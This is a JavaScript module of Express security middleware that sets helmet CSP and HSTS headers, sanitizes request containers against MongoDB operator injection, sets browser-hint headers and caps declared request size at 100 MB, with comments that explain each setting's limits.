import helmet from 'helmet';
import mongoSanitize from 'express-mongo-sanitize';
import crypto from 'crypto';
/**
 * Produce a fresh random value suitable for a CSP `'nonce-…'` source.
 *
 * Draws 16 bytes from the CSPRNG and base64-encodes them (24 characters).
 * Note: `securityHeaders` in this file does not reference this nonce; its
 * scriptSrc is `'self'` only, so any nonce wiring is left to the caller.
 *
 * @returns {string} base64-encoded 16-byte random nonce
 */
export const generateNonce = () => {
  const NONCE_BYTES = 16;
  const raw = crypto.randomBytes(NONCE_BYTES);
  return raw.toString('base64');
};
// CSP directive set handed to helmet. Scripts come only from the origin —
// no 'unsafe-inline', no 'unsafe-eval', and no nonce source (the
// `generateNonce` helper in this file is not referenced by this policy).
// Inline styles are still tolerated, and imgSrc accepts any https: origin.
const cspDirectives = {
  defaultSrc: ["'self'"],
  scriptSrc: ["'self'"], // deliberately no 'unsafe-inline' / 'unsafe-eval'
  styleSrc: ["'self'", "'unsafe-inline'"], // inline styles allowed for now
  imgSrc: ["'self'", 'data:', 'https:', 'blob:'], // any https origin is permitted
  connectSrc: ["'self'"],
  fontSrc: ["'self'", 'data:'],
  objectSrc: ["'none'"],
  mediaSrc: ["'self'"],
  frameSrc: ["'none'"],
  baseUri: ["'self'"],
  formAction: ["'self'"],
  frameAncestors: ["'none'"],
  upgradeInsecureRequests: [],
};

const ONE_YEAR_SECONDS = 31536000;

/**
 * Helmet middleware carrying the app's security headers.
 *
 * COEP is switched off and CORP is `cross-origin`, so the app's resources may
 * be embedded by other origins. HSTS is one year, covering subdomains, with
 * the preload flag set.
 */
export const securityHeaders = helmet({
  contentSecurityPolicy: { directives: cspDirectives },
  crossOriginEmbedderPolicy: false,
  crossOriginResourcePolicy: { policy: 'cross-origin' },
  hsts: {
    maxAge: ONE_YEAR_SECONDS,
    includeSubDomains: true,
    preload: true,
  },
});
/**
 * Run express-mongo-sanitize over the inbound request containers in place,
 * then continue the chain.
 *
 * Only `body`, `query` and `params` are covered; headers and cookies are left
 * untouched. Sanitization is whatever `mongoSanitize.sanitize` does with its
 * defaults — no options are passed here.
 */
export const sanitizeRequest = (req, res, next) => {
  const containers = ['body', 'query', 'params'];
  for (const key of containers) {
    mongoSanitize.sanitize(req[key]);
  }
  next();
};
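/**
 * Set a small set of browser-hint response headers and drop the framework
 * fingerprint, then continue the chain.
 *
 * X-XSS-Protection is set to `0` rather than `1; mode=block`: the legacy
 * auditor has been removed from current browsers, and in older ones the
 * filter itself could be abused to break pages, so disabling it is the
 * current recommendation (and what helmet emits by default). Whether these
 * values override or are overridden by `securityHeaders` depends on the
 * middleware order, which is not visible in this file.
 */
export const xssProtection = (req, res, next) => {
  const headers = {
    'X-Content-Type-Options': 'nosniff',
    'X-Frame-Options': 'DENY', // mirrors frameAncestors 'none' in the CSP
    'X-XSS-Protection': '0', // legacy filter disabled on purpose
    'Referrer-Policy': 'strict-origin-when-cross-origin',
  };
  for (const [name, value] of Object.entries(headers)) {
    res.setHeader(name, value);
  }
  // Do not advertise the framework to clients
  res.removeHeader('X-Powered-By');
  next();
};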
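/**
 * Reject requests whose declared Content-Length exceeds 100 MB with a 413.
 *
 * Only the declared length is inspected: a chunked body carries no
 * Content-Length and passes straight through, so the body parser's own
 * `limit` must still enforce the real bound. A missing or non-numeric header
 * is treated as 0 (pass-through), which matches the previous behaviour where
 * `parseInt` yielded NaN and `NaN > maxSize` was false. The radix is now
 * explicit so a prefixed string cannot be parsed as hex.
 *
 * @param {import('express').Request} req
 * @param {import('express').Response} res
 * @param {Function} next
 */
export const requestSizeLimiter = (req, res, next) => {
  const MAX_BYTES = 100 * 1024 * 1024; // 100MB
  const declared = Number.parseInt(req.headers['content-length'] ?? '0', 10);
  const contentLength = Number.isNaN(declared) ? 0 : declared;
  if (contentLength > MAX_BYTES) {
    return res.status(413).json({
      message: 'Request entity too large',
      maxSize: '100MB',
    });
  }
  next();
};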